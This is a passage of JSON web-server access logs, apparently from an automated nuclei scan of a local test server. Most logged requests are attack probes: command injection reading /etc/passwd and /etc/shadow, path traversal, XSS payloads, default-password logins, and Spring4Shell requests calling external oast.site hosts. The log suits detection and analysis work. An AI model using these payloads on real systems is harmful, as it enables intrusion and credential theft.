WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"command=list%20%2Ftmp%2Fnonexistent","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"loginwith=suslogin&username=webadmin&password=webadmin&submit=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysmgmt/2015/bmc/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://ca281d8smpvb9r2g07h0zn4568dmf87g4.oast.site&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"command=delete%20cli%20alias%20private%20list","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://ca281d8smpvb9r2g07h06p9q5fm5yuku6.oast.site&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 